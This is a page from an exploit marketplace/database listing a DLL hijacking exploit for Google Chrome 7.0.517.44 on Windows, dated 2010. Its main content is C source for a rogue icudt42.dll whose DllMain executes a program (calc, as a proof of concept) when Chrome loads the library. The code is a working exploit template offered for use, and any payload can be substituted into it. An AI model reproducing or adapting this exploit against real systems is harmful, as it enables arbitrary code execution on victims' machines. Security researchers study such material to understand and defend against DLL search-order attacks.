[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Google Chrome 7.0.517.44 DLL Hijacking Exploit 2 (icudt42.dll)

Author
PoisonCode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14910
Category
local exploits
Date add
20-11-2010
Platform
windows
==============================================================
Google Chrome 7.0.517.44 DLL Hijacking Exploit 2 (icudt42.dll)
==============================================================

# Title: Google Chrome 7.0.517.44 DLL Hijacking Exploit(icudt42.dll)
# Software:http://www.google.com/chrome/
# Version: 7.0.517.44
# Tested on: Windows
# Author: PoisonCode
# Email:  PanamaSecurity@hotmail.com
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
 
int PS()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  PS();
  return 0;
}



#  0day.today [2024-11-15]  #